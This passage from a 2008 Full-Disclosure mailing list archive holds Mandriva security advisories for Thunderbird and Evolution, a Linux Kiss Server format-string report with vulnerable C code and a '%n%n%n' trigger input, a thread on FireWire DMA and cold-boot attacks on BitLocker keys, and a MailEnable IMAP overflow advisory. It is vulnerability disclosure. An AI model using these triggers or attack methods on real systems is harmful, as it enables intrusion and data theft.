2008.0/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.12-1mdv2008.0.i586.rpm 8a76eed27b19092e02b896ab3f447a82 2008.0/i586/mozilla-thunderbird-enigmail-ro-2.0.0.12-1mdv2008.0.i586.rpm 0ad75daab8aafaa66d78e95c932d255e 2008.0/i586/mozilla-thunderbird-enigmail-ru-2.0.0.12-1mdv2008.0.i586.rpm 0dee2c95d6455fa2cdf2e382aebfcef8 2008.0/i586/mozilla-thunderbird-enigmail-sk-2.0.0.12-1mdv2008.0.i586.rpm 02f1f0f4e4097449c72fd9c69bbe26f4 2008.0/i586/mozilla-thunderbird-enigmail-sl-2.0.0.12-1mdv2008.0.i586.rpm 0b614b401642e7b780957541190d4800 2008.0/i586/mozilla-thunderbird-enigmail-sv-2.0.0.12-1mdv2008.0.i586.rpm 71de000b22726c59aaddd2494ec9284b 2008.0/i586/mozilla-thunderbird-enigmail-tr-2.0.0.12-1mdv2008.0.i586.rpm 9d3b33f10a46cbfd773bef15d285e53b 2008.0/i586/mozilla-thunderbird-enigmail-zh_CN-2.0.0.12-1mdv2008.0.i586.rpm c8a40b8e286bada49815c5c10dc0d16a 2008.0/i586/mozilla-thunderbird-enigmail-zh_TW-2.0.0.12-1mdv2008.0.i586.rpm 9717ff025358e60598d52383619d232d 2008.0/i586/mozilla-thunderbird-es_AR-2.0.0.12-1mdv2008.0.i586.rpm 4d61b069c9a2af9f7b234cdd9bc500b6 2008.0/i586/mozilla-thunderbird-es_ES-2.0.0.12-1mdv2008.0.i586.rpm 96cc7f0953e105c86b9a5ecde0d0ef4b 2008.0/i586/mozilla-thunderbird-et_EE-2.0.0.12-1mdv2008.0.i586.rpm e3094c943d30f8c823d650b41c59249e 2008.0/i586/mozilla-thunderbird-eu-2.0.0.12-1mdv2008.0.i586.rpm f3a4e20871dc89ad3a2c4278fc145ffd 2008.0/i586/mozilla-thunderbird-fi-2.0.0.12-1mdv2008.0.i586.rpm 9fd804e5ddc2a97fe02418d291848635 2008.0/i586/mozilla-thunderbird-fr-2.0.0.12-1mdv2008.0.i586.rpm 168ae341dc518cc28ab2cbcd165d65cc 2008.0/i586/mozilla-thunderbird-gu_IN-2.0.0.12-1mdv2008.0.i586.rpm 7c7724b418b41063c5300b1dbb1abd16 2008.0/i586/mozilla-thunderbird-he-2.0.0.12-1mdv2008.0.i586.rpm fc74066ce3dac64a05936b1c8327ae03 2008.0/i586/mozilla-thunderbird-hu-2.0.0.12-1mdv2008.0.i586.rpm a3474e3261f7cde15426eff8a700a457 2008.0/i586/mozilla-thunderbird-it-2.0.0.12-1mdv2008.0.i586.rpm 2690f07b271b01b1e8954d7a4b89a502 
2008.0/i586/mozilla-thunderbird-ja-2.0.0.12-1mdv2008.0.i586.rpm 4c886be9746081c21b6d942b0b6c3e8a 2008.0/i586/mozilla-thunderbird-ko-2.0.0.12-1mdv2008.0.i586.rpm 865fdee44d540e7535d5155c1ce6f70f 2008.0/i586/mozilla-thunderbird-lt-2.0.0.12-1mdv2008.0.i586.rpm c60cba375b07d6e4e61762f330f1cc17 2008.0/i586/mozilla-thunderbird-mk-2.0.0.12-1mdv2008.0.i586.rpm ddfaa6ccf729b85a13bbff53123f5500 2008.0/i586/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.i586.rpm 7edcc56a70abe1cb80048086ad58d832 2008.0/i586/mozilla-thunderbird-nb_NO-2.0.0.12-1mdv2008.0.i586.rpm ad7fd0e7b61eef63a377fe99b130e9d1 2008.0/i586/mozilla-thunderbird-nl-2.0.0.12-1mdv2008.0.i586.rpm d8d8633b92971649ecd3d9c58b16606a 2008.0/i586/mozilla-thunderbird-nn_NO-2.0.0.12-1mdv2008.0.i586.rpm b2d8fadf40674326c0083006327737b2 2008.0/i586/mozilla-thunderbird-pa_IN-2.0.0.12-1mdv2008.0.i586.rpm 23668ebd267a040105d7fb06b4dccdee 2008.0/i586/mozilla-thunderbird-pl-2.0.0.12-1mdv2008.0.i586.rpm bf7b31283f51eefb8de3d6028639fb01 2008.0/i586/mozilla-thunderbird-pt_BR-2.0.0.12-1mdv2008.0.i586.rpm 7d07151b6eec12a6cbb5a785d807a35e 2008.0/i586/mozilla-thunderbird-pt_PT-2.0.0.12-1mdv2008.0.i586.rpm 2e4205ccca23d4b4b390a7ece48119dc 2008.0/i586/mozilla-thunderbird-ru-2.0.0.12-1mdv2008.0.i586.rpm 6b028d2b00fcd302fe4b2bb3be55cf0b 2008.0/i586/mozilla-thunderbird-sk-2.0.0.12-1mdv2008.0.i586.rpm 59415d3d4b769e826ed8e7dc5d730a2d 2008.0/i586/mozilla-thunderbird-sl-2.0.0.12-1mdv2008.0.i586.rpm 35a7f5c8f5fd6dbb9161ac63e9b0a32d 2008.0/i586/mozilla-thunderbird-sv_SE-2.0.0.12-1mdv2008.0.i586.rpm 5aa9236d1e735ad1612ac13e3a52beb1 2008.0/i586/mozilla-thunderbird-tr-2.0.0.12-1mdv2008.0.i586.rpm 0a397bf3092e80305eb89c83204e766e 2008.0/i586/mozilla-thunderbird-zh_CN-2.0.0.12-1mdv2008.0.i586.rpm fb6ab92855f022d34bc323bbcf5ac54d 2008.0/i586/mozilla-thunderbird-zh_TW-2.0.0.12-1mdv2008.0.i586.rpm ec13431053abe327341e37749e5799e8 2008.0/i586/nsinstall-2.0.0.12-3mdv2008.0.i586.rpm 78ce807267f62f0e3b62ed88f6df28e4 
2008.0/SRPMS/mozilla-thunderbird-2.0.0.12-3mdv2008.0.src.rpm d84af81f2b8c08891e104ba20328dc2e 2008.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.12-1mdv2008.0.src.rpm 98b203925525d0b6aaf6cb72b287d95c 2008.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.12-1mdv2008.0.src.rpm 391ff5f59e47982bd5902e334f263405 2008.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: eb08abdcd75cd561472dabccf8377f35 2008.0/x86_64/mozilla-thunderbird-2.0.0.12-3mdv2008.0.x86_64.rpm b8ca1680f635f9023d0ee08b25a89217 2008.0/x86_64/mozilla-thunderbird-be-2.0.0.12-1mdv2008.0.x86_64.rpm 46b3ee54068dc2ea4c860ab2dc1583ba 2008.0/x86_64/mozilla-thunderbird-bg-2.0.0.12-1mdv2008.0.x86_64.rpm fb2aee3cf8f3020c72ca4caa87a10349 2008.0/x86_64/mozilla-thunderbird-ca-2.0.0.12-1mdv2008.0.x86_64.rpm 940142439c86d8a20c081a7499d537a0 2008.0/x86_64/mozilla-thunderbird-cs-2.0.0.12-1mdv2008.0.x86_64.rpm 4e48dc642527e683e66a312b60f54b96 2008.0/x86_64/mozilla-thunderbird-da-2.0.0.12-1mdv2008.0.x86_64.rpm 392b702ed54982beb24fc7e2f29dcc97 2008.0/x86_64/mozilla-thunderbird-de-2.0.0.12-1mdv2008.0.x86_64.rpm 30c0805aa83b4cede4461201269b858a 2008.0/x86_64/mozilla-thunderbird-devel-2.0.0.12-3mdv2008.0.x86_64.rpm f614cb044de62a58f09f3ffd6b474134 2008.0/x86_64/mozilla-thunderbird-el-2.0.0.12-1mdv2008.0.x86_64.rpm 2141a96e988b0d1a964b9a923c39fb47 2008.0/x86_64/mozilla-thunderbird-en_GB-2.0.0.12-1mdv2008.0.x86_64.rpm 3cb623d0cbf574e04733ac8c91e67765 2008.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.12-3mdv2008.0.x86_64.rpm 11510f9e1af130bb1278e8627c8dd120 2008.0/x86_64/mozilla-thunderbird-enigmail-ca-2.0.0.12-1mdv2008.0.x86_64.rpm 6d82e1c9c7f0ec4fe6379f567e07e657 2008.0/x86_64/mozilla-thunderbird-enigmail-cs-2.0.0.12-1mdv2008.0.x86_64.rpm 34605d756a70f6e6474bef33109ab724 2008.0/x86_64/mozilla-thunderbird-enigmail-de-2.0.0.12-1mdv2008.0.x86_64.rpm 1ef9f0bc9d8e32c16225bccfbce70d0b 2008.0/x86_64/mozilla-thunderbird-enigmail-el-2.0.0.12-1mdv2008.0.x86_64.rpm 3db07995c00c3730ba261a0ba2050d18 
2008.0/x86_64/mozilla-thunderbird-enigmail-es-2.0.0.12-1mdv2008.0.x86_64.rpm 98244d01f46e6149027b80041fd94488 2008.0/x86_64/mozilla-thunderbird-enigmail-es_AR-2.0.0.12-1mdv2008.0.x86_64.rpm 670a69bade2b15e7e1bc0c0140c21ec9 2008.0/x86_64/mozilla-thunderbird-enigmail-fi-2.0.0.12-1mdv2008.0.x86_64.rpm a7d505eb3926a2493b21b0fd167d9f29 2008.0/x86_64/mozilla-thunderbird-enigmail-fr-2.0.0.12-1mdv2008.0.x86_64.rpm abf8cf1f16c5d7ef5488f0836c8d055a 2008.0/x86_64/mozilla-thunderbird-enigmail-hu-2.0.0.12-1mdv2008.0.x86_64.rpm 4c685f3d3853f0e410e4004938c0e0e2 2008.0/x86_64/mozilla-thunderbird-enigmail-it-2.0.0.12-1mdv2008.0.x86_64.rpm 6a5a276340de9ea6dd481cdf38d88fee 2008.0/x86_64/mozilla-thunderbird-enigmail-ja-2.0.0.12-1mdv2008.0.x86_64.rpm 70391da4b107c8fa8fd021d23ecc7bc3 2008.0/x86_64/mozilla-thunderbird-enigmail-ko-2.0.0.12-1mdv2008.0.x86_64.rpm 144853b172b2a4a90274be16ed8dce3b 2008.0/x86_64/mozilla-thunderbird-enigmail-nb-2.0.0.12-1mdv2008.0.x86_64.rpm 5a41b33f95b4414ebaf5b0b8ab00cf22 2008.0/x86_64/mozilla-thunderbird-enigmail-nl-2.0.0.12-1mdv2008.0.x86_64.rpm 3fb44a4c49bde788dfbce5f15d668e37 2008.0/x86_64/mozilla-thunderbird-enigmail-pl-2.0.0.12-1mdv2008.0.x86_64.rpm e3df9079108ab12e6b82ad96479fc28e 2008.0/x86_64/mozilla-thunderbird-enigmail-pt-2.0.0.12-1mdv2008.0.x86_64.rpm e0ee764bbfd75b3c3e35b8ce957a4225 2008.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-2.0.0.12-1mdv2008.0.x86_64.rpm e760b3f0899c8095e86a6fad8cf20fba 2008.0/x86_64/mozilla-thunderbird-enigmail-ro-2.0.0.12-1mdv2008.0.x86_64.rpm 2917e443bd210962f84176fb1e203187 2008.0/x86_64/mozilla-thunderbird-enigmail-ru-2.0.0.12-1mdv2008.0.x86_64.rpm f18d5659fbc21f1e91a04018cfb7381b 2008.0/x86_64/mozilla-thunderbird-enigmail-sk-2.0.0.12-1mdv2008.0.x86_64.rpm 220fdf154ccdaf3d9efd5eefafc51b20 2008.0/x86_64/mozilla-thunderbird-enigmail-sl-2.0.0.12-1mdv2008.0.x86_64.rpm ad88d7ec6441e9e999c69dd6680953d8 2008.0/x86_64/mozilla-thunderbird-enigmail-sv-2.0.0.12-1mdv2008.0.x86_64.rpm 18c13a56159a255922f24ae9f5221e2b 
2008.0/x86_64/mozilla-thunderbird-enigmail-tr-2.0.0.12-1mdv2008.0.x86_64.rpm 2ae5c55a6157cee2fb29b907c1be9185 2008.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-2.0.0.12-1mdv2008.0.x86_64.rpm 1ae46a58116bea5b51a08f99780f053d 2008.0/x86_64/mozilla-thunderbird-enigmail-zh_TW-2.0.0.12-1mdv2008.0.x86_64.rpm 6c93528f7b2bdc82e63eddf26e1ea097 2008.0/x86_64/mozilla-thunderbird-es_AR-2.0.0.12-1mdv2008.0.x86_64.rpm c71f0feb4a804fdb2ec5b8ce655a3790 2008.0/x86_64/mozilla-thunderbird-es_ES-2.0.0.12-1mdv2008.0.x86_64.rpm 70d8224621fd77ee5956bdc982a4a81e 2008.0/x86_64/mozilla-thunderbird-et_EE-2.0.0.12-1mdv2008.0.x86_64.rpm dc946f0e356c9d9c34ec50bd30017f6a 2008.0/x86_64/mozilla-thunderbird-eu-2.0.0.12-1mdv2008.0.x86_64.rpm 7cd9d9fa9ad9c63f0125c54ceeba7736 2008.0/x86_64/mozilla-thunderbird-fi-2.0.0.12-1mdv2008.0.x86_64.rpm 8d74d4f265575da7019b548bec64b850 2008.0/x86_64/mozilla-thunderbird-fr-2.0.0.12-1mdv2008.0.x86_64.rpm dcb3b625cc1219ec49703cfdc6d23910 2008.0/x86_64/mozilla-thunderbird-gu_IN-2.0.0.12-1mdv2008.0.x86_64.rpm 483c99f3894940e02821745aa9e9cb4f 2008.0/x86_64/mozilla-thunderbird-he-2.0.0.12-1mdv2008.0.x86_64.rpm 7df99f09494bf15998b0d673be72db15 2008.0/x86_64/mozilla-thunderbird-hu-2.0.0.12-1mdv2008.0.x86_64.rpm 109aa2bd22e3771ff2dcc0dcc0adabe9 2008.0/x86_64/mozilla-thunderbird-it-2.0.0.12-1mdv2008.0.x86_64.rpm b41ea6b671d326c73e8d2f272613c7ec 2008.0/x86_64/mozilla-thunderbird-ja-2.0.0.12-1mdv2008.0.x86_64.rpm 84e76ca77c7a76d6a23634cb1532e9b9 2008.0/x86_64/mozilla-thunderbird-ko-2.0.0.12-1mdv2008.0.x86_64.rpm 491b4973889fe0591c1957a895f5812e 2008.0/x86_64/mozilla-thunderbird-lt-2.0.0.12-1mdv2008.0.x86_64.rpm 966582cc0a31ce035a79923c7534a452 2008.0/x86_64/mozilla-thunderbird-mk-2.0.0.12-1mdv2008.0.x86_64.rpm ad62b8a56a1e2610a938324a33d46276 2008.0/x86_64/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.x86_64.rpm 2617e0ed1c8f524b5bee7a78b21357df 2008.0/x86_64/mozilla-thunderbird-nb_NO-2.0.0.12-1mdv2008.0.x86_64.rpm d6cdfa7d37e9b80c5360683980488af5 
2008.0/x86_64/mozilla-thunderbird-nl-2.0.0.12-1mdv2008.0.x86_64.rpm 75ae2f0b17c267c6575793db0bf332c0 2008.0/x86_64/mozilla-thunderbird-nn_NO-2.0.0.12-1mdv2008.0.x86_64.rpm 080c54bcdc467d6f9044386d061bac5c 2008.0/x86_64/mozilla-thunderbird-pa_IN-2.0.0.12-1mdv2008.0.x86_64.rpm 7e1826af0000ac6b50c3ffcbb0084d7b 2008.0/x86_64/mozilla-thunderbird-pl-2.0.0.12-1mdv2008.0.x86_64.rpm de564601490c8589fd3d888476a2104f 2008.0/x86_64/mozilla-thunderbird-pt_BR-2.0.0.12-1mdv2008.0.x86_64.rpm d064e998350d02d6ece29899ae38df58 2008.0/x86_64/mozilla-thunderbird-pt_PT-2.0.0.12-1mdv2008.0.x86_64.rpm 9e8f33b780294ab307a41aac845931c8 2008.0/x86_64/mozilla-thunderbird-ru-2.0.0.12-1mdv2008.0.x86_64.rpm 9e882027464f818dbcf7f5494e036a5e 2008.0/x86_64/mozilla-thunderbird-sk-2.0.0.12-1mdv2008.0.x86_64.rpm 5bb1a407b6c8cde72cdcb68d491a1fca 2008.0/x86_64/mozilla-thunderbird-sl-2.0.0.12-1mdv2008.0.x86_64.rpm ca98127a1ea29e0f228bf735c5f7fbdf 2008.0/x86_64/mozilla-thunderbird-sv_SE-2.0.0.12-1mdv2008.0.x86_64.rpm 9f5eebad8042d5aa066291decadebc09 2008.0/x86_64/mozilla-thunderbird-tr-2.0.0.12-1mdv2008.0.x86_64.rpm aa7791c9623c83fa2aa68374d5823d2d 2008.0/x86_64/mozilla-thunderbird-zh_CN-2.0.0.12-1mdv2008.0.x86_64.rpm 7d6abfb8295a0891edd8af639c6726ab 2008.0/x86_64/mozilla-thunderbird-zh_TW-2.0.0.12-1mdv2008.0.x86_64.rpm 2b12bc7459afaa5c54b5c944d9dbaf67 2008.0/x86_64/nsinstall-2.0.0.12-3mdv2008.0.x86_64.rpm 78ce807267f62f0e3b62ed88f6df28e4 2008.0/SRPMS/mozilla-thunderbird-2.0.0.12-3mdv2008.0.src.rpm d84af81f2b8c08891e104ba20328dc2e 2008.0/SRPMS/mozilla-thunderbird-enigmail-l10n-2.0.0.12-1mdv2008.0.src.rpm 98b203925525d0b6aaf6cb72b287d95c 2008.0/SRPMS/mozilla-thunderbird-l10n-2.0.0.12-1mdv2008.0.src.rpm 391ff5f59e47982bd5902e334f263405 2008.0/SRPMS/mozilla-thunderbird-moztraybiff-1.2.3-4mdv2008.0.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. 
The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFH0HRumqjQ0CJFipgRAlKkAKCCb+ioyrGdeGj2/4V49ANnBa405wCfXDYU
3NU5/COnqPpS7+vYk2NPmRQ=
=lIL7
-----END PGP SIGNATURE-----

From security at mandriva.com Fri Mar 7 02:42:37 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 06 Mar 2008 19:42:37 -0700
Subject: [Full-disclosure] [ MDVSA-2008:063 ] - Updated Evolution packages fix critical vulnerability
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:063
http://www.mandriva.com/security/
_______________________________________________________________________

Package : evolution
Date    : March 6, 2008
Affected: 2007.1, 2008.0
_______________________________________________________________________

Problem Description:

Ulf Harnhammar of Secunia Research discovered a format string flaw in how Evolution displayed encrypted mail content. If a user were to open a carefully crafted email message, arbitrary code could be executed with the permissions of the user running Evolution.

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0072
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFH0IDwmqjQ0CJFipgRAmtrAKCGVdhPZQGuGThz2nx5+nPDwLQVHwCfXkVE
Qh479nJKUgUhwrrDha/xGKA=
=GDLZ
-----END PGP SIGNATURE-----

From demottja at msu.edu Fri Mar 7 14:47:41 2008
From: demottja at msu.edu (Jared DeMott)
Date: Fri, 07 Mar 2008 09:47:41 -0500
Subject: [Full-disclosure] Hackers are having a positive influence on the world
Message-ID: <47D1558D.80706@msu.edu>

http://www.hackersforcharity.org/

Join the fun!

Jared

From david.judais at googlemail.com Fri Mar 7 13:53:33 2008
From: david.judais at googlemail.com (David Judais)
Date: Fri, 7 Mar 2008 08:53:33 -0500
Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2
In-Reply-To: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com>
References: <66e421d70803051329n12d82a8etf4fc714258025c27@mail.gmail.com>
Message-ID: <66e421d70803070553h2891a9beq1472bdf156ef41bc@mail.gmail.com>

Sorry, my response became detached from the original thread somehow.

On Wed, Mar 5, 2008 at 4:29 PM, David Judais wrote:
> Why isn't there a patch?
>
> From: vashnukad at vashnukad.com
>
> Site: http://www.vashnukad.com
> Application: Linux Kiss Server v1.2
> Type: Format strings
> Priority: Medium
> Patch available: No
>
> The Linux Kiss Server contains a format strings vulnerability that, if run
> in foreground mode, can be leveraged for access. The vulnerability is
> demonstrated in the code below:
>
> Function log_message():
>
>     if(background_mode == 0)
>     {
>         if(type == 'l')
>             fprintf(stdout,log_msg);
>
>         if(type == 'e')
>             fprintf(stderr,log_msg);
>         free(log_msg);
>     }
>
> Function kiss_parse_cmd():
>
>     /* check full command name */
>     if (strncmp(cmd, buf, cmd_len))
>     {
>         asprintf(&log_msg,"unknow command: `%s'", buf);
>         log_message(log_msg,'e');
>         goto error;
>     }
>     buf += cmd_len;
>
> So putting something like %n%n%n in 'buf' you can trigger the
> vulnerability.
>
> --
> Name: Vashnukad
> E-mail: vashnukad at vashnukad.com
> Site: http://www.vashnukad.com
>
> --
> Name: Vashnukad
> e-mail: vashnukad at vashnukad.com
> Site: http://www.vashnukad.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080307/2df8c068/attachment.html

From thor at hammerofgod.com Fri Mar 7 17:42:28 2008
From: thor at hammerofgod.com (Thor (Hammer of God))
Date: Fri, 7 Mar 2008 09:42:28 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <20080306200009.GB5138@sentinelchicken.org>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org>
Message-ID:

I made a short reply to this yesterday, but it probably came off as flippant and thus didn't get posted.
However, if one insists on leaving their machine unattended in a public place, but have at least locked it, but are still worried that someone will use a hardware-based firewire attack, then just disable the host controller in the first place and be done with it.

Or, if one is already using a firewire device, but has walked away and left their laptop alone in a public place along with that firewire device on and activated and are worried about someone coming along and plugging in their own in order to grab your Bitlocker key, then don't have autorun (which is default) automatically enabled for the device.

Of course that won't stop someone from opening up the laptop with their handy-dandy Leatherman and using canned air turned upside down to "freeze" the memory chip, take it out, put it in their laptop, search for the key in memory, and then put it back in the other box to then steal the data.

But more to Mr. Grimes's original point, I actually don't mind seeing this put as a "Vista" attack, be it "unpatched," or an attack against the activation mechanism, or whatever. If the "Vista Firewire" attack is what it takes for people to get into the news about Vista "vulnerabilities," then I consider that a good thing.

t

> -----Original Message-----
> From: Tim [mailto:tim-security at sentinelchicken.org]
> Sent: Thursday, March 06, 2008 12:00 PM
> To: Larry Seltzer
> Cc: Full Disclosure; Bugtraq
> Subject: Re: [Full-disclosure] Firewire Attack on Windows Vista
>
> > What are the implications for firewire device compatibility of doing
> > this?
>
> I am no expert on ieee1394, but I have read up a bit on this and tested
> Metlstorm's memory dumping tool and here's what I understand:
>
> Firewire chipsets allow drivers to configure a particular memory range
> which is open to access by DMA devices. Since the memory transfers
> occur completely without software intervention, the only way to restrict
> this is to tell the chip ahead of time what to allow and what not to
> allow. Before these tools came out, most free OSes simply opened up
> access completely to physical memory for any device. However, Windows
> would not do this. It would only open up access to devices that it
> thought needed DMA. This is why Metlstorm had to make his Linux machine
> behave like an iPod to fool Windows into spreading its legs.
>
> Since the exploit tools came out for this, free OSes quickly started
> providing options to tell the chips not to open up access. I have
> tested the Linux drivers with the phys_dma=0 option, and found that some
> disk devices worked fine while others did not. I can confirm that the
> memory dumping tools did not work with this option set.
>
> Of course this is not an optimal fix. The drivers should just
> automatically restrict the DMA accesses in real time to a range that is
> safe but still permits devices to use it. (Presumably to buffers
> allocated specifically for I/O.) Not sure if some devices would still
> have problems with this, but I think this is the intended operation of
> ieee1394 based on the specs and I'd imagine it would work on a greater
> number of devices than having it disabled completely.
>
> Someone please correct me if I'm wrong on any of this.
>
> tim

From jay.tomas at infosecguru.com Fri Mar 7 17:39:15 2008
From: jay.tomas at infosecguru.com (Jay)
Date: Fri, 7 Mar 2008 12:39:15 -0500
Subject: [Full-disclosure] IE8 beta is available - Challenge
Message-ID: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com>

Who can be the one to find and publish the first exploit?
http://www.microsoft.com/windows/products/winfamily/ie/ie8/readiness/Install.htm

Jay

From Larry at larryseltzer.com Fri Mar 7 18:00:55 2008
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Fri, 7 Mar 2008 13:00:55 -0500
Subject: [Full-disclosure] IE8 beta is available - Challenge
In-Reply-To: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com>
References: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F23@becca.LarrySeltzer.local>

>>Who can be the one to find and publish the first exploit?

I hear you can completely compromise an IE8 system through the Firewire port.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com

From kurtdillard at msn.com Fri Mar 7 18:22:40 2008
From: kurtdillard at msn.com (Kurt Dillard)
Date: Fri, 7 Mar 2008 16:22:40 -0200
Subject: [Full-disclosure] IE8 beta is available - Challenge
In-Reply-To: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com>
References: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com>
Message-ID:

Breaking pre-release software doesn't sound all that impressive but I'm sure Microsoft would appreciate more people helping them to find bugs;)

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Jay
Sent: Friday, March 07, 2008 3:39 PM
To: full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] IE8 beta is available - Challenge

Who can be the one to find and publish the first exploit?

http://www.microsoft.com/windows/products/winfamily/ie/ie8/readiness/Install.htm

Jay

From oliver.starke at aipermon.com Fri Mar 7 18:09:52 2008
From: oliver.starke at aipermon.com (Oliver Starke)
Date: Fri, 7 Mar 2008 19:09:52 +0100
Subject: [Full-disclosure] IE8 beta is available - Challenge
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F23@becca.LarrySeltzer.local>
References: <8F9509A5731B413CB46E77D7DE780385.MAI@thewolfenet.com> <0273B67044957C41BD71D12EBA2E00AE252F23@becca.LarrySeltzer.local>
Message-ID: <20080307190952.61fc3491@DEVICE2.actimon.de>

LOL :)

On Fri, 7 Mar 2008 13:00:55 -0500 "Larry Seltzer" wrote:
> >>Who can be the one to find and publish the first exploit?
>
> I hear you can completely compromise an IE8 system through the
> Firewire port.
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blogs.pcmag.com/securitywatch/
> Contributing Editor, PC Magazine
> larry.seltzer at ziffdavisenterprise.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
Oliver Starke
Research & Development
Aipermon GmbH & Co. KG
Phone: +49-89-97890-123
Fax: +49-89-97890-199
Email: oliver.starke at aipermon.de

Aipermon GmbH & Co. KG / Registered office: Zamdorfer Str.100, 81677 Muenchen / District court: Muenchen / HRA 88852 / VAT ID: DE241346387
General partner: Aipermon Beteiligungs-GmbH / Registered office: Zamdorfer Str. 100, 81677 Muenchen / District court: Muenchen / HRB 164406 / Tax no.: 143/200/00662
Managing directors: Dr. Thomas Schweizer, Dominik Wegertseder

From aluigi at autistici.org Fri Mar 7 19:00:40 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 7 Mar 2008 20:00:40 +0100
Subject: [Full-disclosure] Multiple vulnerabilities in MailEnable Professional/Enterprise 3.13
Message-ID: <20080307200040.e3b46e97.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  MailEnable Professional and Enterprise
              http://www.mailenable.com
Versions:     <= 3.13
Platforms:    Windows
Bugs:         A] multiple post-auth buffer-overflows
              B] NULL pointers
Exploitation: remote, versus the IMAP service
Date:         07 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

MailEnable is a mail server for Windows which supports various protocols like SMTP, POP3, IMAP, webmail and an HTTPMail service.

#######################################################################

=======
2) Bugs
=======

--------------------------------------
A] multiple post-auth buffer-overflows
--------------------------------------

The IMAP service (MEIMAPS.exe) of MailEnable is affected by some buffer-overflow vulnerabilities caused by too long parameters passed to the FETCH, EXAMINE and UNSUBSCRIBE commands allowing an attacker to execute malicious code.
All the vulnerable commands require an account to be exploited.

----------------
B] NULL pointers
----------------

The IMAP service is affected also by two NULL pointer vulnerabilities exploitable through the omission of the required arguments for the SEARCH and APPEND commands, where the first can be used by unauthenticated attackers too.
####################################################################### =========== 3) The Code =========== http://aluigi.org/poc/maildisable.zip ####################################################################### ====== 4) Fix ====== No fix ####################################################################### --- Luigi Auriemma http://aluigi.org From thor at hammerofgod.com Fri Mar 7 19:40:11 2008 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Fri, 7 Mar 2008 11:40:11 -0800 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> Message-ID: > key, then don't have autorun (which is default) automatically enabled > for the device. Thanks to Blue Boar for pointing out that autorun doesn't have anything to do with it if the attack device can have the drivers automatically installed (and, of course, that the host controller is enabled). Original points stand... t From Larry at larryseltzer.com Fri Mar 7 19:44:12 2008 From: Larry at larryseltzer.com (Larry Seltzer) Date: Fri, 7 Mar 2008 14:44:12 -0500 Subject: [Full-disclosure] Firewire Attack on Windows 